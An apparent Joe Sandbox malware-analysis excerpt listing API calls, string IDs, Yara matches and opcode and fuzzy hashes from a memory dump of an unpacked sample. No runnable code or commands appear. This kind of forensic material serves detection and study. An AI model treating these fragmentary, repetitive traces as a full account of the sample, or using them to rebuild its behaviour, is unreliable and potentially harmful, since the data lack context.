                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                          • API String ID: 667068680-2897241497
                          • Opcode ID: b5833069ae474c4c5936d1bb37857093b8e160cd104588c0bdb069467e024a18
                          • Instruction ID: 0c6e80d2cd4d852bbcf0d13c32b975f7affc432616e76e6080f0b5a3c05e53ef
                          • Opcode Fuzzy Hash: b5833069ae474c4c5936d1bb37857093b8e160cd104588c0bdb069467e024a18
                          • Instruction Fuzzy Hash: F0F03C76564204FFC714DFA0EC4C7AA7B74A748302F10507EA909922A2C77858C8CF1C
                          APIs
                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,0041CC83), ref: 004145D9
                          • GetProcAddress.KERNEL32(0041CC83,RtlDecompressBuffer), ref: 004145EB
                          • GetProcAddress.KERNEL32(0041CC83,RtlGetCompressionWorkSpaceSize), ref: 004145FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                          • API String ID: 667068680-1459209654
                          • Opcode ID: 12eb84a2ad7da26ac98e0bb4dfa6020314f6c907d9ce4db396483fb9dd3fc3f5
                          • Instruction ID: eae89aa9e54ec5fe30aaa5054764df6fa712763fe0a5d5df84310ac6675ccaff
                          • Opcode Fuzzy Hash: 12eb84a2ad7da26ac98e0bb4dfa6020314f6c907d9ce4db396483fb9dd3fc3f5
                          • Instruction Fuzzy Hash: DEF03A74A05204FBD724CBA4E909BA977B4E785706F1015BBE408822B0E678A9C9CA19
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$GET$application/octet-stream$text/plain
                          • API String ID: 0-1326944966
                          • Opcode ID: e8558670ebd19a465f2cc52b574e65a62a8c73e3c0d5628d88af1ffd4544ecbf
                          • Instruction ID: 3b5f2e9da9426d44645e64c87a8eb70c880a44e6c3c5a92d7912c720405387ee
                          • Opcode Fuzzy Hash: e8558670ebd19a465f2cc52b574e65a62a8c73e3c0d5628d88af1ffd4544ecbf
                          • Instruction Fuzzy Hash: 0BF10F70A00218DFDB14DFA4CD49BEEB7B5FB48704F108599E509AB284D7749AC4CF9A
                          APIs
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004221BA
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0042224D
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422270
                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00422288
                          • Sleep.KERNEL32(00000BB8), ref: 004222A1
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004222BB
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004222D3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00422351
                          • LocalAlloc.KERNEL32(00000040,00000004), ref: 00422368
                          • CreateThread.KERNEL32(00000000,00000000,00422650,00000000,00000000,00000000), ref: 00422394
                          • GetTickCount.KERNEL32 ref: 004223B1
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004223D9
                          • SetEvent.KERNEL32(00000000), ref: 004224C2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004224CE
                          • CloseHandle.KERNEL32(00000000), ref: 004224E9
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004225A7
                          • SetEvent.KERNEL32(00000000), ref: 004225B8
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004225C4
                          • CloseHandle.KERNEL32(00000000), ref: 004225D4
                          • CloseHandle.KERNEL32(00000000), ref: 004225EB
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTick
                          • String ID:
                          • API String ID: 3997620821-0
                          • Opcode ID: d002ee51f2baca840a06b6ab246674f7e9fafdfcbf353304c68a9000ce76f39f
                          • Instruction ID: 06073eb95e3d92e63929033871a363c0ea52abaf58939d7c64c74a1e757a3379
                          • Opcode Fuzzy Hash: d002ee51f2baca840a06b6ab246674f7e9fafdfcbf353304c68a9000ce76f39f
                          • Instruction Fuzzy Hash: BD118E74A04214FFDB54CFE0F94CBAEB7B0FB49301F50846AE20566290C7B85588CF29
                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 0042875D
                            • Part of subcall function 00424A47: __getptd.LIBCMT ref: 00424A55
                            • Part of subcall function 00424A47: __getptd.LIBCMT ref: 00424A63
                          • __getptd.LIBCMT ref: 00428767
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 00428775
                          • __getptd.LIBCMT ref: 00428783
                          • __getptd.LIBCMT ref: 0042878E
                          • _CallCatchBlock2.LIBCMT ref: 004287B4
                            • Part of subcall function 00424AEC: __CallSettingFrame@12.LIBCMT ref: 00424B38
                            • Part of subcall function 0042885B: __getptd.LIBCMT ref: 0042886A
                            • Part of subcall function 0042885B: __getptd.LIBCMT ref: 00428878
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 8c81b6205adf69f81b8a27efc814c6f22dcca121137f3e194516562ed428d844
                          • Instruction ID: ff6e657a384014cc070408bc5d47213e9fb4f84d3490c6a2d7023cbb59465c98
                          • Opcode Fuzzy Hash: 8c81b6205adf69f81b8a27efc814c6f22dcca121137f3e194516562ed428d844
                          • Instruction Fuzzy Hash: 4B11F971E00219EFDF00EFA5D485A9DBBB0FF04314F9084AEF814A7251DB389A159FA8
                          APIs
                          • __getptd.LIBCMT ref: 00429C36
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __amsg_exit.LIBCMT ref: 00429C56
                          • __lock.LIBCMT ref: 00429C66
                          • InterlockedDecrement.KERNEL32(?), ref: 00429C83
                          • _free.LIBCMT ref: 00429C96
                          • InterlockedIncrement.KERNEL32(?), ref: 00429CAE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 3470314060-0
                          • Opcode ID: 36271023b223fadb9ab6e712b6c59eb3779a78d2d1be80bf2b56bb847cdc28d0
                          • Instruction ID: f4cbf64d02b6ba1de177e689c24b6bfbfdcea36b97806bb26546d54a50972fe8
                          • Instruction Fuzzy Hash: 66018E31F40731DBDB25AB66A88579EB7B0AF44714F91401BE81867281DB3CAC82CBDD
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CloseHandleInfoLocale___crt$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 733634416-2564639436
                          • Opcode ID: f161013116c55da72c63ce6aca6e420a63ce0a8e746b5f21adae62202949ffd6
                          • Instruction ID: dcbe7d409504b365a2a01452fac66c244b140dda19594937d55e93dcf8af10d5
                          • Instruction Fuzzy Hash: BEA13C71E001189FFB24CF64C885FEAB775FB84308F1082A9E21DAB281D775AA95CF55
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                          • _memset.LIBCMT ref: 0041501B
                          Strings
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt_memset
                          • String ID: $!$"$#
                          • API String ID: 2773535-1968938309
                          • Opcode ID: 879969bbcf9e88a68d182caabacd3840cb6aa25ddd5c16974c51c5bb072f6322
                          • Instruction ID: 2f7971235c982305489604d19ee49821e6440a5144027d68376bde22ab5174f8
                          • Instruction Fuzzy Hash: E081F8B0904219DBEF24DF90D949BDEBBB5BB44308F1082E9D50C6B281D7BA5AC8CF55
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: fcb17fb08f8a2ff92cdf329a4d91d832edf0e00a8f6b7ae9b3bbe9ed01b1c473
                          • Instruction ID: 28724bebe1558540128be9fac75f6438f6b6aced3d1ed3787778429b146f4564
                          • Instruction Fuzzy Hash: 3A51C571A04508DBFF18DF94D688BEEBB76FB90309F114269D1166F280C739EA85CB45
                          APIs
                          • _memset.LIBCMT ref: 00402304
                          • _memset.LIBCMT ref: 0040233B
                          • __snwprintf.LIBCMT ref: 004023C1
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • LocalFree.KERNEL32(00000000), ref: 0040246D
                          Strings
                          Yara matches
                          Similarity
                          • API ID: _memset$FreeLocal__snwprintflstrlen
                          • String ID: D
                          • API String ID: 547233621-2746444292
                          • Opcode ID: 4634d576b41030485f2a96de2ad68d93fd5a6a344a01d45422100c6525b31f8c
                          • Instruction ID: 81c63f112d8dcbf07734da269fae86012bad78d6b23292d5f0bd21b72de31d1a
                          • Instruction Fuzzy Hash: C2513BB1A012289FEB24DF50DD49BDAB778EB49304F0041EAE649A62C0D7B85BC4CF59
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: %s\%s$Software\%s
                          • API String ID: 2688013242-2632556899
                          • Opcode ID: 305207b4268d95a49d7e2fc9998977da54dd48712996234ef1c47d2f84a7d1c0
                          • Instruction ID: 69d85d81a122c71a471752251a4d3d692c880ee31a208757014cc80ab34610d5
                          • Instruction Fuzzy Hash: 4C513B74E082589BDB24DB60DC4ABA97274FF48700F5041FAA50DA6684DBBC6AC8CF59
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004146EA
                          • CloseHandle.KERNEL32(00000000), ref: 00414707
                          • CloseHandle.KERNEL32(00000000), ref: 00414757
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ObjectSingleWait
                          • String ID: d
                          • API String ID: 2079671238-2564639436
                          • Opcode ID: a5f96bb87789628176a693ee8ee1716a4ddfd4f6497c231a73e9ba452fa58583
                          • Instruction ID: 7e9b78c2089fb5eeab0749f5871383a4faea996be51a3f975beff24ae6811640
                          • Instruction Fuzzy Hash: 0D518F31A04504DBFB18DF94CA88BADB776EBD030DF2442ADD1166F2D0C739AA95CB49
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrlen$__snwprintf
                          • String ID: %s\%s\
                          • API String ID: 943882683-2168696002
                          • Opcode ID: 4eaf386347df97857c49bb7d8605883d18f9c58badc4eb0c2abeeb1f880bd2d7
                          • Instruction ID: e147fc819eea64ca5bfbedf496181ac7fb7691f2af72f04a92943b164336590f
                          • Instruction Fuzzy Hash: F631CAB5A00209DFCB04DFA8D995AEEBBB5FF48304F148169EA09A7351D734A940CF99
                          APIs
                          • _memset.LIBCMT ref: 00408200
                          • _memset.LIBCMT ref: 0040821F
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snwprintf.LIBCMT ref: 00408266
                          • __snwprintf.LIBCMT ref: 0040828B
                          Strings
                          Yara matches
                          Similarity
                          • API ID: __snwprintflstrlen$_memset
                          • String ID: %s%s
                          • API String ID: 2330956672-3252725368
                          • Opcode ID: 865d7628b5a174b59cb6c7e6ff2d55de3777c8ac3998084ebc6a3df48adac488
                          • Instruction ID: b20160649954e81e419212330c58fef505bed6343514b354166d05e66b797ae1
                          • Instruction Fuzzy Hash: B321D971A4021897C750D7609C8DBEA7338AB54700F500AEEF619E21D1EBB99EC58F99
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: __snwprintf$lstrlen
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 3284962732-2868705786
                          • Opcode ID: 8b726a830be8a4895b1832ded17cdd1fbffd47a2450d479dd0b3ea99e2b69f56
                          • Instruction ID: 3e696753d65392d370302bbd45998c798e2be41506fe4e983add93e44d77990d
                          • Instruction Fuzzy Hash: 2E215C74E00208FFDB14EFE0CD49BAE7775EF48700F6044A9E605A7290D7B89A84CB58
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 00428AF5
                            • Part of subcall function 00428A50: ___BuildCatchObjectHelper.LIBCMT ref: 00428A86
                          • _UnwindNestedFrames.LIBCMT ref: 00428B0C
                          • ___FrameUnwindToState.LIBCMT ref: 00428B1A
                          Strings
                          Yara matches
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: csm$csm
                          • API String ID: 2163707966-3733052814
                          • Opcode ID: c644bb1f34e25dafeecb1de0a9cf138c67f1586482ca544ae8a6169931f09bde
                          • Instruction ID: 00180cedc8860145d2baff6723f8d8810d5bee4d271c32bfdd03eb9c5d3e9107
                          • Instruction Fuzzy Hash: 07018B71102129BBDF12AF41EC41EAF7F6AEF48348F40401ABD1810121DB3AA8B1DBA8
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0040108A), ref: 0041D2CB
                          • GetProcAddress.KERNEL32(0040108A,IsWow64Process), ref: 0041D2E4
                          • GetCurrentProcess.KERNEL32(00000000), ref: 0041D300
                          Strings
                          Yara matches
                          Similarity
                          • API ID: AddressCurrentHandleModuleProcProcess
                          • String ID: IsWow64Process$KERNEL32.DLL
                          • API String ID: 4190356694-1193389583
                          • Opcode ID: 6249933a974de57c9e72640388aaa2f8dcce2c95180c80794cf5e82f17424973
                          • Instruction ID: 1921a2b7e29602db8bc9adfb27e401dbea3e546df6c6ed425b6de87b01e167cf
                          • Instruction Fuzzy Hash: 64F0A5B5D01208EFCB14EFE4D849BDDBFB8AB08301F209596A915A3240D778AA84DF59
                          APIs
                          • LoadLibraryW.KERNEL32(USER32.DLL,?,?,00401085), ref: 0040684B
                          • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 00406863
                          • FreeLibrary.KERNEL32(00000000), ref: 0040687C
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: SetProcessDPIAware$USER32.DLL
                          • API String ID: 145871493-772676101
                          • Opcode ID: 0e00f6680c7169ac265b0daa26ad8c3df0e65beedca7a244a355361eb86d0d96
                          • Instruction ID: d7e75f9fdd6377fbbd5236d9263629de4369e5fcd131ab1d584c9b0fff14c4d8
                          • Instruction Fuzzy Hash: B2E03975E02308EFCB04EFE4D90C6CDBFB4AB48301F2190A6E906A3280D6786A40CB54
                          APIs
                          • __getptd.LIBCMT ref: 004284A9
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 004284BA
                          • __getptd.LIBCMT ref: 004284C8
                          Strings
                          Yara matches
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$RCC
                          • API String ID: 803148776-2084237596
                          • Opcode ID: 93a7f3190e18b71f68f9d5de1e5f93c09d1e50684f76553ed21605a82b369ded
                          • Instruction ID: 7737c63d3136a0828a1331f2bbc2fa1bb380afa4dd28c4cacb1ee6c0cfc97e33
                          • Instruction Fuzzy Hash: 00E01231715125DFD710BB69E44A76E3295BB84318F9904EBE80CC7323EB7CDC50996A
                          APIs
                            • Part of subcall function 0040CB60: lstrlenW.KERNEL32(?), ref: 0040CBC0
                          • _memmove.LIBCMT ref: 004168D6
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 004168E6
                          • lstrcpyW.KERNEL32(-00010000,00000000), ref: 004168F9
                          • lstrcpyW.KERNEL32(-00020000,00000000), ref: 0041690D
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004169F8
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FreeVirtual_memmovelstrlen
                          • String ID:
                          • API String ID: 2365145790-0
                          • Opcode ID: 92839ab944face02cee3ff4d524ef7b910f60baafcd187accdf4e5d222d91e7c
                          • Instruction ID: 06fa96edf5e054ad43188d8be7ed40ae1f202543c7b99a146bbeaf362dd0ad67
                          • Instruction Fuzzy Hash: 4E713DB5D00208DBDB04DFA4D889BEEBBB5FB48305F148529E50577280D7789984CF68
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00417E07
                          • CloseHandle.KERNEL32(?), ref: 00417E39
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417E57
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417E8C
                          • ResumeThread.KERNEL32(00000000), ref: 00417ECC
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00417F39
                          • CloseHandle.KERNEL32(?), ref: 00417F71
                          • CloseHandle.KERNEL32(?), ref: 00417FA3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417FC1
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417FF5
                          • ResumeThread.KERNEL32(00000000), ref: 00418035
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID:
                          • API String ID: 738346648-0
                          • Opcode ID: 590f01a21b9718ac9ed64399f36247e05f455f45cc3c043a5bbdee1abbca3eb7
                          • Instruction ID: 2c11c2abda471f898dc428e74e83c8a7033fe9b91b3710d809d7093046dab45b
                          • Instruction Fuzzy Hash: ED416FB1A041059BDB48CF54C9C9FBEB7B2FB94304F15556EE21AAF2D1C730A891CB58
                          APIs
                          • _malloc.LIBCMT ref: 0042F542
                            • Part of subcall function 004256B9: __FF_MSGBANNER.LIBCMT ref: 004256D2
                            • Part of subcall function 004256B9: __NMSG_WRITE.LIBCMT ref: 004256D9
                            • Part of subcall function 004256B9: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00405B83,?), ref: 004256FE
                          • _free.LIBCMT ref: 0042F555
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap_free_malloc
                          • String ID:
                          • API String ID: 1020059152-0
                          • Opcode ID: 441664d7da4678698a6d9d0ed19a3842fb2feae85e2a5a83bfc4feba8890b744
                          • Instruction ID: d978e831b2cafcf954e5248f81c6a5c961bbb316b0d0cf1e3abffdfde8d45e15
                          • Instruction Fuzzy Hash: 6C11B232701635BACB256F35BC0465E36A4AF807A4BE0443FF94996252DE3C9885869C
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: ece4f18416405fd832fad1abf87d3e54d1f91ce04ab1e08181c4e170daad7968
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: b686ff8bdfc05e106c20aa80165a9efd769ff4f8deaa7f8e744bc8b9cdd6501d
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: f74986d97ae5e8538954fb663ead6fb8cf86ad82d44154c6794cd10ba1680438
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 731f9bbc109e3ef206682bf242c89cf76e1722f8ae557b99efb38a03e99548d8
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: f713cfee621fd032cf6ea7a1be68935ccbbaf2e16e950218fcf80006d3a728d0
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 1fb1270d296bbd46eb1cc8022cfb665c3bbc0e02fc8c9adec0eea0844cc3e8fe
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 9da45043f5abe3937aea9bc193c07396d5de998bdd8a888cc472dc2aac9b643f
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 59b72818c02ad9c66f209a0dfa9ef427c6eaac385237f59953ff017e171112e7
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 923f2690e53a1e9e59a38cd21ecfb9ec9b96ad37252adccc829242ddd140fc2d
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 923f2690e53a1e9e59a38cd21ecfb9ec9b96ad37252adccc829242ddd140fc2d
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 726fe5a15c6e3ed4538379076c4d21b316697b763511a6986fe77f809b4a26bb
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 726fe5a15c6e3ed4538379076c4d21b316697b763511a6986fe77f809b4a26bb
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: bc44ae451ed6c7b1307a31a309ac5ea6ca7e599d641f7a3b57ce190f045905c8
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: bc44ae451ed6c7b1307a31a309ac5ea6ca7e599d641f7a3b57ce190f045905c8
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00005004,?,00401633,0043E040,00000000), ref: 0041DE0D
                          • LocalAlloc.KERNEL32(00000040,00000000,?,?,00401633), ref: 0041DE37
                          • LocalFree.KERNEL32(00000000), ref: 0041DE74
                          • LocalFree.KERNEL32(00000000,?,?,00401633), ref: 0041DE7E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFree
                          • String ID: @C
                          • API String ID: 2012307162-1618053064
                          • Opcode ID: 414ae59593def5ab2f8fc855c7d7ef84a6a16e40d3485aa113c49327277a0ced
                          • Instruction ID: a03c80496656666fd240000d4683b53c919ffd3f4920f710f5485bbfcaab9ccc
                          • Opcode Fuzzy Hash: 414ae59593def5ab2f8fc855c7d7ef84a6a16e40d3485aa113c49327277a0ced
                          • Instruction Fuzzy Hash: 251133B5E00308EFCB04DFE4D849BDEB7B4EB58305F008569E6159B290D778AA84CF94
                          APIs
                          • SetEvent.KERNEL32(?), ref: 0041D9F5
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041DA04
                          • CloseHandle.KERNEL32(?), ref: 0041DA11
                          • CloseHandle.KERNEL32(?), ref: 0041DA1E
                          • LocalFree.KERNEL32(00000000), ref: 0041DA38
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3879024238-0
                          • Opcode ID: de0fa354a8bf079bf6eb281e5a023c9c6e82e3ce10cf06fa8df24ade5fe33fdc
                          • Instruction ID: e8293441bbabc7d2dc90927d518e544b42cb184100bb40537d13b5f841ea70bc
